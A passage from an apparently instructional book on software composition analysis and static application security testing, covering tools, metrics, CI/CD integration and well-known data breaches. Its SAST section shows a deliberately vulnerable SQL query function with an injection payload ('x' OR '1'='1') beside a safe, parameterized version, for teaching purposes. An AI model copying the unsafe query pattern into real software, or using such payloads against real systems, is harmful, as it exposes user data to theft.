• Every open source component comes with a license, and they're not all created equal. Some might have conditions that conflict with your project's objectives or commercial ambitions.
• SCA is like that keen-eyed friend who, knowing you want to showcase your completed puzzle at an art gallery, reminds you which pieces have copyrights that might prevent that.
Dependency transparency:
• Modern software often involves layers upon layers of dependencies. You might add a piece to your puzzle, not realizing it brings along ten other pieces connected to it.
• SCA tools help you see not only the primary components you're using but also their transitive dependencies, ensuring you're aware of the full picture.


Prioritization and remediation:
• Let's say a few puzzle pieces are problematic. Which do you replace first? Which ones can wait?
• SCA tools can highlight the severity of issues, letting you focus on replacing the most problematic pieces immediately while planning for the rest.
Integration with development processes:
• In the dynamic world of software development, CI/CD is the norm. It's about integrating security checks at every stage of the CI/CD pipeline, ensuring a "shift-left" approach to security.
• SCA tools integrate directly into these development pipelines, ensuring that every piece is vetted as it's added. It's like checking the quality and fit of every puzzle piece in real time as you work.
Informed decision-making:
• Before choosing a component, developers can consult the SCA tool to see if it has known issues or if there are safer alternatives
• It's like having a puzzle aficionado beside you, advising on which sets tend to have the best pieces for your project

The benefits of SCA
SCA tools offer multiple advantages, including bolstering the security of third-party code, ensuring legal compliance with licensing, providing timely updates for vulnerabilities, and streamlining the process of identifying potential threats, all of which grant developers peace of mind. However, they're not without drawbacks. These tools can sometimes raise unnecessary alerts, and they may be complex and intimidating for new users. Note that SCA tools primarily focus on third-party components rather than custom-written code; for custom-written code, other tools such as static application security testing (SAST) are more appropriate. They can also be a financial strain for some teams and might face compatibility issues with certain development processes or tools.
Advantages:
• Safety first: Imagine that your software is a house. SCA tools are like security checks that make sure you're not unknowingly using bricks that crumble easily. They ensure the third-party code you're using is going to stay intact and keep the bad guys out.
• No surprises on the legal front: Using someone else's code? That comes with rules. Think of these tools as legal advisors who make sure you're not accidentally breaking any of those rules. This way, you're not slapped with unexpected legal issues.
• Keeping up with the times: Software vulnerabilities are like fashion; what's secure today might not be tomorrow. SCA tools give you a nudge when your code is outdated, helping you update and stay trendy (or in this case, secure).


• Save time and energy: Instead of manually digging through every line of third-party code to see if it's safe, these tools do the heavy lifting. It's like having a metal detector while looking for needles in a haystack.
• Peace of mind: Sleep better knowing you've got a watchdog. These tools continuously scan and alert you if something goes wrong, so you're not constantly on edge.
Disadvantages:
• False alarms: False positives can lead to alert fatigue, where genuine threats might be overlooked due to the sheer volume of alerts.
• Complexity can be overwhelming: Some of these tools come with lots of bells and whistles. For a newbie or occasional user, it can feel like trying to fly a spaceship when all you wanted was a bicycle.
• It's not a magic bullet: Just because you have an SCA tool doesn't mean you're 100% safe. They mostly focus on open source components, so any custom code you've written still needs its own set of eyes and checks. Relying solely on them is like having a guard dog but leaving the front door unlocked.
• Cost: Quality often comes at a price. Some of these tools can be expensive, especially for small teams or individual developers. It's an investment, and like all investments, it needs careful consideration.
• Integration hiccups: Integration challenges are not just about "fitting"; they can also arise due to compatibility issues, version mismatches, or lack of support for specific platforms or languages.

SAST versus SCA
SAST and SCA are both important techniques that are used to identify security vulnerabilities in software applications, but they differ in their approach and focus.
SAST uses a set of predefined rules and algorithms to scan the code and identify issues such as buffer overflows, SQL injection, cross-site scripting (XSS), and other common vulnerabilities. SAST can help identify security issues early in the development process, when fixing them is easier and cheaper. SAST tools can also be integrated into the development process to automate code scanning and improve the efficiency of security testing.
On the other hand, SCA focuses on identifying potential vulnerabilities in third-party software components used in an application's development. SCA analyzes the dependencies in the application code and identifies any known security vulnerabilities in the open source components used. SCA can help identify vulnerabilities in third-party components that may not be apparent from looking at the application's source code.


Here are some points that make a difference:
• Scope: SAST analyzes the application source code to identify vulnerabilities in the application code itself. It looks for issues such as buffer overflows, SQL injection, XSS, and other common vulnerabilities. In contrast, SCA analyzes the third-party components used in the development of the application to identify known security vulnerabilities in those components.
• Approach: SAST tools can be rule-based or heuristic-based, and they analyze the code's flow to identify potential vulnerabilities. SAST does not require the application to be running or any external dependencies to be present. SCA, on the other hand, relies on a database of known vulnerabilities to analyze the third-party components that are used in the application. It may also require access to external package repositories to download information about the components used.
• Integration: SAST can be integrated into the development process to automate code scanning and improve the efficiency of security testing. SCA can also be integrated into the development process, but it typically requires more effort to set up and maintain.
• Timing: SAST can be performed early in the development process, before the application is deployed, to identify and fix vulnerabilities before they can be exploited. SCA can likewise run early, but it should also be repeated continuously, since new vulnerabilities in existing components are disclosed over time.
• Results: SAST provides a detailed report of potential vulnerabilities in the application source code, including the location of the vulnerability and recommendations for remediation. SCA provides a report of known vulnerabilities in the third-party components used in the application, including information about the severity of the vulnerability and recommendations for remediation.
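The difference in scope can be illustrated with two toy checkers: a rule-based scan over the application's own source text (SAST-style) and a lookup of declared dependencies against known advisories (SCA-style). The regex rules, package name, and CVE identifier are simplified, hypothetical stand-ins, nothing like a real scanner's rule set.

```python
import re

# SAST-style: pattern rules applied to the application's own source
SAST_RULES = {
    "possible SQL injection": re.compile(r"execute\(.*\+.*\)"),
    "hardcoded secret": re.compile(r"password\s*=\s*['\"]"),
}

# SCA-style: known-vulnerable third-party (name, version) pairs
ADVISORIES = {("leftpadx", "1.0.0"): "CVE-XXXX-0001 (hypothetical)"}

def sast_scan(source):
    """Flag rule matches in the code itself."""
    return [issue for issue, rx in SAST_RULES.items() if rx.search(source)]

def sca_scan(dependencies):
    """Flag dependencies listed in the advisory database."""
    return [ADVISORIES[d] for d in dependencies if d in ADVISORIES]

code = 'cursor.execute("SELECT * FROM users WHERE id=" + user_id)'
print(sast_scan(code))                    # flags the string concatenation
print(sca_scan([("leftpadx", "1.0.0")]))  # flags the vulnerable dependency
```

Note how neither checker needs the application to be running, but the SAST side inspects source while the SCA side only inspects the dependency list, which is exactly the Scope and Approach distinction above.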

The SCA process
SCA is a process similar to vetting the ingredients of a dish at a fancy restaurant. You want to make sure everything that goes into that dish is fresh, safe to consume, and doesn't conflict with dietary restrictions. Let's understand this analogy in simple terms.
Gathering the ingredients (Discovery):
• Before you can check anything, you need to know what's in the dish. In software, this means understanding which external components or "ingredients" (such as open source libraries or third-party plugins) are in your application.
• The SCA tool scans the software to identify all these components, both the ones you directly added and those brought in indirectly because they're dependencies of the primary components.
Checking the ingredients' freshness (Vulnerability detection):
• With a list of ingredients in hand, the SCA tool then checks each one against a database of known vulnerabilities, just as a chef might inspect each vegetable or piece of meat for signs of rot or contamination.


• If the tool finds a match between a component in your software and a known vulnerability, it'll raise a flag. It's like finding out that the tomatoes you're using were part of a batch that was recalled for salmonella!
Dietary restrictions (License compliance):
• Just as certain foods have dietary restrictions, software components come with licensing terms that need to be adhered to. Some licenses say, "Hey, use me for free, but if you make any changes, you have to share those changes with everyone." Others might have stricter or looser terms.
• The SCA tool checks the licenses of all components against your company's policies to ensure there's no legal conflict. If there's a mismatch, it's like finding out a dish has peanuts when it shouldn't – a big no-no!
Recipe recommendations (Remediation guidance):
• If there's a problem with one of the ingredients, the tool doesn't just stop at identifying it – it also suggests alternatives or solutions. For instance, if a particular version of a component has a vulnerability, the tool might recommend upgrading to a newer, safer version.
• It's like a chef finding out a particular ingredient is bad and then checking a cookbook for an alternative ingredient or preparation method.
Keeping an eye out (Continuous monitoring):
• New vulnerabilities and issues are discovered every day. So, the SCA tool constantly monitors for updates about the components you're using.
• Think of it as a chef who's always listening to food safety alerts to ensure none of the ingredients in their pantry has been recalled or flagged as unsafe since their last check.
Clear communication (Reporting):
• Once the tool has finished analyzing, it presents its findings in a comprehensive report. This report details what's been found, how severe it is, and what can be done about it.
• Imagine a chef presenting a detailed breakdown of a dish, its ingredients, its sources, and any potential dietary concerns to a diner.
SCA is like a thorough quality and safety check for the components of a software application. By ensuring everything is up to par, you’re not just making your software safer and more legally compliant – you’re also ensuring a better user experience, just as a diner would enjoy a well-prepared, safe, and delicious meal!


SCA metrics
SCA metrics are like the vital signs and health indicators for your software's third-party ingredients. Just as a doctor would measure blood pressure, cholesterol, or glucose levels to assess your health, SCA metrics give you an idea about the health and risks associated with your software's components. Let's delve into some of these key metrics:
• Total dependencies (direct and transitive):
‚ Think of this as the total number of ingredients in your recipe. Some you add directly (such as salt or flour) and others come along because they're part of something else (like how buying a cake mix might bring along baking powder and flavorings).
‚ It tells you how many external components your software relies on, both those you've chosen and those that hitch a ride with your primary choices.
• Vulnerable dependencies:
‚ This is the count of your ingredients that have known problems. Maybe a certain spice is recalled because it contains contaminants. In software, this refers to components with known security issues.
‚ Keeping this number low is crucial for the safety of your software dish!
• License compliance violations:
‚ Imagine you're using a secret sauce from a chef who says, "You can use it, but only in certain dishes." This metric tells you how many of your ingredients (software components) might be breaking such rules.
‚ It's essential for avoiding potential legal headaches.
• Outdated dependencies:
‚ Just as fresh ingredients make the best dishes, using the latest versions of software components is usually a good idea. This metric tells you how many of your components are outdated and could be updated for better performance or safety.
• Severity breakdown of vulnerabilities:
‚ Not all bad ingredients are equally harmful. Maybe one ingredient is slightly stale, while another is outright moldy. Similarly, this metric breaks down vulnerabilities by their severity – critical, high, medium, or low.
‚ It helps prioritize which issues to tackle first.


• Mean time to remediation (MTTR):
‚ Once a problem ingredient is identified, how long does it take to fix or replace it? MTTR measures the average time it takes to address a vulnerability after it's detected.
‚ A lower MTTR is like a chef quickly swapping out a rotten vegetable for a fresh one.
• Policy violations:
‚ Sometimes, certain ingredients are off-limits because of dietary preferences or health reasons. In the software world, these are company-specific rules on which components or licenses to avoid. This metric highlights where you might be going against these guidelines.
• Repeated vulnerabilities:
‚ Are you making the same mistakes repeatedly? Just as a chef might continually forget to deseed a chili, this metric tracks if certain vulnerabilities keep cropping up in your software.
‚ Recognizing patterns helps in taking corrective measures for the long term.
SCA metrics act as the health report card for your software's third-party components. They offer a comprehensive picture, highlighting areas of strength and pointing out where immediate attention is needed, ensuring that your software dish remains delicious, safe, and without any unwanted surprises!
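Several of these metrics can be computed directly from scan findings. The records below are invented, and the timestamps are in whole days to keep the MTTR arithmetic easy to follow.

```python
from collections import Counter

# Hypothetical findings: severity plus detection/fix day (None = not yet fixed)
FINDINGS = [
    {"severity": "critical", "detected": 0, "fixed": 2},
    {"severity": "high",     "detected": 1, "fixed": 5},
    {"severity": "low",      "detected": 3, "fixed": None},
]

def severity_breakdown(findings):
    """Count findings per severity level."""
    return Counter(f["severity"] for f in findings)

def mttr_days(findings):
    """Mean time to remediation over the findings that have been fixed."""
    durations = [f["fixed"] - f["detected"] for f in findings if f["fixed"] is not None]
    return sum(durations) / len(durations) if durations else None

print(severity_breakdown(FINDINGS))
print(mttr_days(FINDINGS))  # (2 + 4) / 2 = 3.0
```

Unfixed findings are deliberately excluded from MTTR; some teams instead track their age separately so open critical issues don't disappear from the dashboard.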

Integrating SCA with other security tools
Integrating SCA with other security tools ensures that every aspect of your software, from the custom code you write to the third-party components you use, is checked and re-checked for potential issues. It's like building a house where the architect, electrician, plumber, and safety inspector all collaborate, ensuring the result is a sturdy, safe, and lasting structure.
Let's imagine your software development process as constructing a building. Just as you'd need various specialists such as architects, electricians, plumbers, and safety inspectors working together to build a safe and functional structure, in the software realm, you need various tools to ensure robust and secure applications. One of those specialists is SCA. Let's see how this SCA "specialist" collaborates with other "specialists" in the software construction process:
1. SCA and SAST:
‚ Analogy: SAST is like checking the structural design of the building. It ensures that the blueprint itself has no inherent flaws.
‚ Integration: By combining SCA (which checks the quality of building materials or third-party components) with SAST (which checks the architectural soundness of the custom code), you get a comprehensive view. Both ensure that your software is well designed and made of reliable components.


2. SCA and dynamic application security testing (DAST):
‚ Analogy: DAST is like evaluating the building when it’s functioning – checking electrical systems under load or plumbing under pressure.
‚ Integration: While DAST tests the running application for vulnerabilities, SCA ensures the third-party components are not introducing weaknesses. When integrated, you’re making sure your building works as intended and that its materials won’t fail you.
3. SCA and interactive application security testing (IAST):
‚ Analogy: IAST is like having sensors throughout the building, providing real-time feedback during various scenarios.
‚ Integration: As IAST monitors the application from within, combining it with SCA ensures that both internal operations and third-party components are being monitored simultaneously, offering a real-time, holistic view of the application’s security.
4. SCA and container security:
‚ Analogy: If your software is a household item, then container security ensures the safety of the box it comes in. Containers bundle up software with all its dependencies, ensuring consistency across various environments.
‚ Integration: By integrating SCA with container security tools, you can ensure that not only is the software’s “box” safe, but the third-party components inside are also free of vulnerabilities.
5. SCA and software development and integration tools (for example, CI/CD tools):
‚ Analogy: CI/CD tools are like conveyor belts and automated machinery in a factory, ensuring smooth, consistent, and rapid production.
‚ Integration: Introducing SCA into these tools ensures that every piece of software, every update or feature, goes through a checkpoint to ensure third-party components are safe. It’s like having a quality checker at every stage of the production line.
6. SCA and threat intelligence platforms:
‚ Analogy: These platforms are like your security information hub, gathering data about potential threats from various sources.
‚ Integration: When SCA tools are integrated with threat intelligence, they can provide richer insights. It’s like cross-referencing the quality of your building materials with recent market recalls or warnings.
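The “quality checker at every stage” idea from item 5 can be sketched as a small pipeline script. This is a minimal, hypothetical illustration: the stage functions, package names, and rules below are invented for the demo, not real tool APIs.

```python
# Each security "specialist" (SCA, SAST, ...) is modeled as a stage that
# returns a list of findings; the pipeline stops at the first checkpoint
# that reports a problem. All data here is illustrative.

def sca_stage(dependencies):
    """Flag third-party components that appear on a known-bad list."""
    known_bad = {("log4j-core", "2.14.1"), ("struts2-core", "2.3.31")}
    return [f"vulnerable dependency: {name} {version}"
            for name, version in dependencies if (name, version) in known_bad]

def sast_stage(source_files):
    """Very naive custom-code check: flag files containing eval()."""
    return [f"risky construct in {path}"
            for path, text in source_files.items() if "eval(" in text]

def run_pipeline(dependencies, source_files):
    """Run each checkpoint in order; return (passed, findings)."""
    for stage in (lambda: sca_stage(dependencies),
                  lambda: sast_stage(source_files)):
        findings = stage()
        if findings:  # fail fast at the first checkpoint with issues
            return False, findings
    return True, []

passed, findings = run_pipeline(
    dependencies=[("log4j-core", "2.14.1"), ("requests", "2.31.0")],
    source_files={"app.py": "print('hello')"},
)
print(passed, findings)  # build blocked by the SCA checkpoint
```

Real pipelines wire the same pattern into CI/CD jobs, with each stage invoking an actual tool and the job's exit code deciding whether the build proceeds.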


Resolving the issues without breaking the build

Before we dive into the heart of the matter, let’s clarify what “the build” means. In software development, “building” refers to the process of converting source code into executable applications. The term “breaking the build” means introducing changes (often unintentionally) that stop the software from compiling or running correctly.

The adage “prevention is better than a cure” rings true. Ensuring that issues are resolved without breaking the build maintains the momentum of development, safeguards team morale, and upholds user trust. With practices such as CI, unit testing, and code reviews, developers can gracefully handle issues without letting them disrupt the larger machinery of software delivery.

Let’s look at why resolving issues without breaking the build is important:

• Continuity of development: A broken build can halt the development process. If developers have to stop their work to fix a broken build, it delays the project and derails their focus.
• Efficiency: Time spent fixing a broken build is time not spent adding features or addressing other tasks. It’s a costly distraction.
• Team morale: Constantly dealing with broken builds can be frustrating and demoralizing for a development team. It can lead to finger-pointing and a decrease in team cohesion.
• Customer trust: For software that’s already in production, breaking the build can mean downtime or bugs for users, which erodes trust.

We can do the following to resolve issues without breaking the build:

• Unit testing: Before integrating changes into the main code base, run unit tests to ensure that the new code works as expected and doesn’t introduce new bugs.
• CI: Use CI tools to automatically compile and test your application every time changes are made. This provides immediate feedback if something’s broken, allowing for quick fixes.
• Feature flags: Implement feature flags to toggle new changes. If a new feature causes issues, you can turn it off without affecting the rest of the application.
• Rollback strategy: Always have a plan to quickly revert changes. If a new deployment breaks the build, rolling back to the previous stable version ensures continuity.
• Code reviews: Before integrating new code, have another team member review it. A fresh pair of eyes can catch potential issues.
• Environment parity: Ensure that your development, testing, and production environments are as similar as possible. This reduces the “it works on my machine” problem.
• Incremental changes: Instead of making massive changes at once, make smaller, incremental changes. This way, if something goes wrong, it’s easier to pinpoint and rectify.


• Documentation: Keep thorough documentation. If a problem arises, developers can understand the context and purpose of the code, making it easier to fix without unintended side effects.
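The feature-flag technique from the list above can be sketched in a few lines. This is a minimal illustration with an in-memory dict as flag storage; real systems read flags from a config service or a dedicated product, and the function names here are invented for the demo.

```python
# A risky new code path ships "dark" behind a flag, so if it misbehaves it
# can be switched off by an operator without a redeploy or a broken build.
FLAGS = {"new_checkout": False}   # toggled at runtime, not by a redeploy

def is_enabled(flag):
    return FLAGS.get(flag, False)

def legacy_checkout(cart_total):
    return round(cart_total * 1.08, 2)      # known-good path (e.g. 8% tax)

def new_checkout(cart_total):
    raise NotImplementedError("still being hardened")

def checkout(cart_total):
    if is_enabled("new_checkout"):
        return new_checkout(cart_total)     # risky new path
    return legacy_checkout(cart_total)      # safe default

print(checkout(100.0))  # → 108.0 (flag off, legacy path)
```

If the new path starts failing in production, flipping `FLAGS["new_checkout"]` back to `False` restores the old behavior immediately, which is exactly the "turn it off without affecting the rest of the application" property described above.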

Detection of security flaws

SCA tools are primarily focused on detecting vulnerabilities in open source and third-party components. However, it’s important to understand that while SCA tools are a crucial part of the software security landscape, they specifically cater to the threats posed by the reuse of external components. Here’s a deeper dive into how SCA tools detect security flaws:

• Open source databases and repositories: SCA tools continuously monitor and pull data from popular vulnerability databases such as the NVD, as well as other sources such as security advisories, mailing lists, or even GitHub repositories.
• Dependency analysis: SCA tools analyze the list of dependencies used in an application. This includes both direct dependencies (the ones you include explicitly) and transitive dependencies (dependencies of your dependencies).
• Version checking: Once the tool knows which components and versions are being used, it checks them against its database of known vulnerabilities. If a used component version has a known vulnerability, it will be flagged.
• License analysis: While not a “security flaw” in the traditional sense, license violations can pose a legal risk to organizations. SCA tools identify the licenses of incorporated components and alert users to potential license conflicts or non-compliance.
• Continuous monitoring: As new vulnerabilities are discovered every day, SCA tools continuously monitor for updates to vulnerabilities that might affect components in your applications. This ensures that the user is alerted in real time or as soon as a new vulnerability is made public.
• Policy enforcement: Many SCA tools allow organizations to set up specific security policies. If a component violates these policies (for example, it has a high-severity vulnerability or uses a forbidden license), the tool will flag it.
• Remediation recommendations: Beyond detection, many SCA tools also provide recommendations or even automated solutions to address the identified vulnerabilities, guiding developers on updating to a safer version or replacing the vulnerable component.

However, it’s essential to note that while SCA tools are excellent for identifying known vulnerabilities in third-party components, they do not typically identify vulnerabilities in custom-written code or more sophisticated security flaws. For those, other security tools such as SAST or DAST tools would be more appropriate.
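At its core, the dependency-analysis and version-checking steps above reduce to a lookup: compare each declared component (direct or transitive) against a table of known-vulnerable versions. A minimal Python sketch, using fabricated package names and advisory data rather than a real feed such as the NVD:

```python
# Fabricated "advisory database" for illustration only. A real SCA tool
# pulls this data from feeds such as the NVD and matches affected version
# *ranges*, not just exact version strings.
KNOWN_VULNERABLE = {
    "examplelib": {"1.0.0", "1.0.1"},   # hypothetical advisories
    "otherlib": {"2.2.0"},
}

def check_dependencies(deps):
    """deps: iterable of (name, version) pairs, direct and transitive.
    Returns the components that match a known-vulnerable version."""
    return [(name, version) for name, version in deps
            if version in KNOWN_VULNERABLE.get(name, set())]

flagged = check_dependencies([("examplelib", "1.0.1"), ("otherlib", "2.3.0")])
print(flagged)  # → [('examplelib', '1.0.1')]
```

Continuous monitoring then amounts to re-running this check whenever either side changes: the application's dependency list, or the advisory database.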


Open source SCA tools

SCA tools are used to identify and manage open source and third-party components in software applications. These tools help ensure the components are free from vulnerabilities, comply with licenses, and meet security and quality standards. Here is an overview of some popular SCA tools and their functionalities:

• WhiteSource:
‚ Functionality: Detects open source components, reports on vulnerabilities, provides remediation insights, and ensures license compliance
‚ Features: Real-time alerts, integration with dev tools, license risk analysis, and dependency check
• Snyk:
‚ Functionality: Focuses primarily on finding and fixing vulnerabilities in open source dependencies
‚ Features: Continuous monitoring, automatic pull requests for fixes, integration with popular development platforms, and a vulnerability database
• FOSSA:
‚ Functionality: Offers automated license compliance and vulnerability management
‚ Features: Deep dependency analysis, policy enforcement, CI/CD integration, and license compliance checks
• Dependency-Check:
‚ Functionality: An open source SCA tool that identifies project dependencies and checks whether there are any known, publicly disclosed vulnerabilities
‚ Features: Command-line interface, integration with build tools such as Maven and Gradle, and a local database of vulnerabilities
• Nexus Lifecycle by Sonatype:
‚ Functionality: Automatically identifies open source risks in applications from the developer’s IDE, through CI/CD, to production
‚ Features: Real-time monitoring, policy enforcement, integration with Nexus Repository, and remediation guidance


• Veracode Software Composition Analysis:
‚ Functionality: Identifies risks from open source components to ensure they are secure and compliant
‚ Features: Visual graphs of component layers, integration with CI/CD pipelines, and policy enforcement
• Mend.io:
‚ Functionality: Mend.io provides automated remediation for open source and custom code to improve application security and save crucial time for developers
‚ Features: Mend.io is designed to streamline the bug-fixing process in software development. It uses cutting-edge algorithms and machine learning to automatically identify and fix code issues.

These tools, and others in the market, often provide a combination of features, including continuous monitoring, policy enforcement, CI/CD integration, and alerting mechanisms. When selecting an SCA tool, consider factors such as the depth of the tool’s vulnerability database, ease of integration with your development tools, and the level of support provided by the vendor.
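In practice, most of these tools can emit a machine-readable report that CI jobs post-process. The sketch below summarizes a small JSON document whose shape loosely mirrors what a tool such as OWASP Dependency-Check emits (a “dependencies” array whose entries may carry a “vulnerabilities” list). Treat the exact field names as assumptions to adapt to your tool’s actual output format; the report data itself is synthetic.

```python
import json
from collections import Counter

# Synthetic report; real reports come from the tool's JSON output file.
REPORT = json.loads("""
{"dependencies": [
  {"fileName": "examplelib-1.0.1.jar",
   "vulnerabilities": [{"name": "CVE-0000-0001", "severity": "HIGH"}]},
  {"fileName": "cleanlib-3.2.0.jar"}
]}
""")

def summarize(report):
    """Count findings per severity across all scanned components."""
    counts = Counter()
    for dep in report.get("dependencies", []):
        for vuln in dep.get("vulnerabilities", []):
            counts[vuln.get("severity", "UNKNOWN")] += 1
    return counts

print(dict(summarize(REPORT)))  # → {'HIGH': 1}
```

A CI job can turn such a summary into a pass/fail decision or a dashboard metric without caring which vendor produced the report.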

Discussing past breaches

Let’s delve into a few of the most impactful security breaches from the past, detailing their causes and ramifications. For each breach, I’ll also mention sources you can search for further reading:

1. Equifax (2017):
‚ Details: Equifax, a giant in the credit reporting industry, disclosed that the personal data of 147 million people, including Social Security numbers, addresses, and in some cases, credit card information, had been exposed.
‚ Cause: The breach was attributed to a web application vulnerability related to Apache Struts, a popular open source framework. Equifax failed to patch this vulnerability in time.
‚ Impact: The breach had significant consequences, affecting almost half of the U.S. population. It led to regulatory fines and a class-action lawsuit.
‚ Further reading: Look for the Equifax breach on the US Federal Trade Commission’s official website.
2. Yahoo! (2013-2014):
‚ Details: Yahoo! had two major data breaches. The one in 2013 affected 1 billion user accounts, while the other in 2014 affected 500 million. In 2017, the company disclosed that all 3 billion of its user accounts had been affected in total.


‚ Cause: While Yahoo! suggested that the breach was the work of state-sponsored hackers, the specifics of the exploit were not fully detailed.
‚ Impact: Personal data, including names, email addresses, hashed passwords, and security questions, was exposed. The breaches significantly impacted Yahoo!’s reputation and its sale price in its acquisition by Verizon.
‚ Further reading: Articles from Reuters and The New York Times covered this breach extensively.
3. Target (2013):
‚ Details: Cybercriminals stole 40 million credit and debit card records and an additional 70 million customer records.
‚ Cause: The attackers initially gained access via an HVAC vendor with network access for billing purposes. They then placed malware on Target’s point-of-sale (PoS) systems.
‚ Impact: Beyond the immediate data theft, Target faced over 90 lawsuits, a damaged reputation, and significant expenses for mitigation.
‚ Further reading: Search for Target’s breach reports on KrebsOnSecurity, a leading cybersecurity blog.
4. Sony Pictures (2014):
‚ Details: A high-profile attack where unreleased films, scripts, private emails, employee data, and more were leaked.
‚ Cause: While the specifics of the intrusion method were not publicly detailed, North Korea was blamed, possibly due to Sony’s film The Interview, which mocked the North Korean leader.
‚ Impact: The leak of emails and documents was particularly embarrassing and damaging for Sony. The breach changed how Hollywood approached cybersecurity.
‚ Further reading: The Guardian and Wired have detailed articles on this topic.
5. Capital One (2019):
‚ Details: Data from over 100 million customers was exposed, including names, addresses, and credit scores.
‚ Cause: The breach was unique as it was attributed to a former employee of AWS, Capital One’s cloud provider. She exploited a misconfigured web application firewall.
‚ Impact: Capital One faced significant reputational damage, regulatory scrutiny, and potential lawsuits.
‚ Further reading: The Wall Street Journal and CNN covered this breach in depth.


6. Marriott (2018):
‚ Details: Personal data from approximately 500 million guests was exposed.
‚ Cause: The breach began on the Starwood guest reservation database in 2014, before Marriott’s acquisition of Starwood. Unauthorized access persisted for four years.
‚ Impact: This breach was significant not just in its scale; it also emphasized the importance of cybersecurity assessments during mergers and acquisitions.
‚ Further reading: BBC and Reuters provided extensive coverage of this incident.

Summary

SCA is akin to a detective that examines all the parts and pieces (components) that make up a software product. The detective looks at third-party or open source components to ensure there are no known vulnerabilities, licensing issues, or outdated elements. Imagine building a house with some pre-made materials, such as bricks, doors, or windows. If you didn’t know where they came from or their quality, the house might have weak points. Similarly, modern software relies heavily on third-party components. SCA helps companies understand what’s in their software “house,” ensuring it’s safe, secure, and legally compliant.

The following are the benefits of SCA:

• Security: By identifying and resolving known vulnerabilities in third-party components, software is less prone to hacks
• Compliance: With SCA, you can track licenses, ensuring you’re not violating any terms
• Maintenance: It’s easier to update or patch components when you know what you’re using
• Confidence: Developers and businesses can be more assured that their software product is robust and safe

Security flaws in software are like cracks in a dam. They might seem small, but they can lead to massive failures. SCA tools scan components against databases of known vulnerabilities, giving developers insights into potential risks. By identifying these “cracks,” they can be sealed before causing harm.

Breaches such as the ones at Equifax, Yahoo!, and Target highlight the importance of proactive security measures, including timely patching, secure configurations, and continuous monitoring. Often, these breaches were due to unpatched vulnerabilities or oversights. They remind us that even giants aren’t immune and that thorough, proactive security practices are crucial.


The open source community offers several tools for SCA. Here are some notable examples:

• OWASP Dependency-Check: This tool checks project dependencies for publicly disclosed vulnerabilities
• OWASP Dependency-Track: This tool consumes and continuously analyzes software bills of materials (SBOMs) to track component risk across a portfolio of applications

SCA is like a health checkup for software, examining its third-party components for vulnerabilities, compliance issues, and other risks. Its importance can’t be overstated in today’s digital world as software often relies on numerous external components. With the help of SCA, we can ensure our software is secure, compliant, and maintainable. This is highlighted by past major breaches, where minor overlooked vulnerabilities led to significant damages. For those looking to adopt SCA without heavy investments, the open source community offers a range of tools to get started. In essence, SCA is a pivotal practice in modern software development, acting as a guardian against potential threats and pitfalls.

In the next chapter, we will cover SAST and the different types of techniques and tools that are used to perform SAST.

9
Static Application Security Testing (SAST)

Software security is an essential aspect of software development, and Static Application Security Testing (SAST) is an essential tool in ensuring software security. SAST is a type of security testing that involves analyzing source code or compiled binaries to identify security vulnerabilities. SAST tools can help developers find security flaws early in the development life cycle, reducing the risk of security incidents and ensuring compliance with security standards.

This chapter will provide an overview of SAST, its benefits and limitations, and how it fits into the overall software development process. SAST occurs early in the Software Development Life Cycle (SDLC) as it analyzes code in a non-running state and does not require a working application.

This chapter covers the following topics, including the free and open source tools around SAST:

• What is SAST?
• Identifying vulnerabilities early in the development process
• Resolving issues without breaking the build
• Benefits of SAST
• Open source SAST tools

Introduction

Software security testing is a crucial component of the software development process as it ensures that software applications are secure and resilient against attacks. It involves testing software for vulnerabilities and weaknesses that attackers can exploit to gain unauthorized access, steal data, or cause harm to the system. Various types of security testing exist, including SAST, Dynamic Application Security Testing (DAST), Interactive Application Security Testing (IAST), and penetration testing.


Security testing is not a one-time activity but rather a continuous process that needs to be integrated into the SDLC. It involves identifying security requirements, assessing potential risks, developing security controls, implementing security measures, and monitoring the system for any security incidents. Software security is a critical aspect of modern software development, and it requires continuous attention and effort to ensure that software applications are secure and resilient against security risks.

What is SAST?

SAST is a type of security testing that analyzes source code or compiled binaries to identify potential security vulnerabilities. SAST is performed during software development and helps developers find security flaws early in the SDLC.

SAST is beneficial in identifying security flaws early in the development process, facilitating easier and more cost-effective remediation. Additionally, SAST helps ensure compliance with security standards and regulations, such as the OWASP Top Ten, PCI DSS, and HIPAA.

However, SAST has its limitations. Many SAST tools produce false positives and false negatives, which can be time-consuming to investigate and fix. False positives occur when the tool identifies a vulnerability that is not present, while false negatives occur when the tool fails to detect a vulnerability that actually is present. SAST tools can also have difficulty detecting certain types of vulnerabilities, such as those related to runtime behavior.

SAST is an essential tool in ensuring software security, and its benefits outweigh its limitations. SAST should be integrated into the software development process, along with other security testing techniques, to ensure that software applications are secure and resilient against security risks.
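To make this concrete, here is a small Python illustration of the kind of flaw a SAST tool can flag purely by analyzing the code, with no running application: user input concatenated into a SQL query, shown next to the parameterized fix that a tool’s report would typically recommend. The table and data are invented for the demo.

```python
import sqlite3

def find_user_unsafe(conn, username):
    # SAST rule match: tainted input flows into a query string (SQL injection)
    return conn.execute(
        "SELECT id FROM users WHERE name = '" + username + "'").fetchall()

def find_user_safe(conn, username):
    # Parameterized query: the driver binds the value, so the rule no longer fires
    return conn.execute(
        "SELECT id FROM users WHERE name = ?", (username,)).fetchall()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice')")

# The payload makes the WHERE clause always true in the unsafe version:
print(find_user_unsafe(conn, "x' OR '1'='1"))  # → [(1,)]
print(find_user_safe(conn, "x' OR '1'='1"))    # → []
```

A static analyzer finds the first function by tracing the flow of an untrusted value into a query string; it never needs to execute the payload, which is why SAST works so early in the SDLC.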

SAST tools and their functionalities

SAST tools are automated software tools that are used to analyze source code or compiled binaries to identify potential security vulnerabilities. SAST tools use a set of predefined rules and algorithms to scan the code and identify vulnerabilities that can be exploited by attackers. SAST tools statically analyze the code, without execution, to identify patterns and recognize vulnerabilities. These tools can detect issues such as buffer overflows, SQL injection, Cross-Site Scripting (XSS), and other common vulnerabilities.

Some common functionalities of SAST tools are as follows:

• Code analysis: SAST tools analyze the source code and identify potential vulnerabilities. They check for coding errors, insecure coding practices, and other issues that can lead to security vulnerabilities.


• Rule-based scanning: SAST tools use predefined rules to scan the code and identify potential security vulnerabilities. These rules are based on best practices and known vulnerabilities, and they can be customized to suit the specific needs of the organization.
• False positive reduction: SAST tools use techniques such as data flow analysis, taint analysis, and control flow analysis to reduce false positives. False positives occur when the tool identifies a vulnerability that is not present in the code.
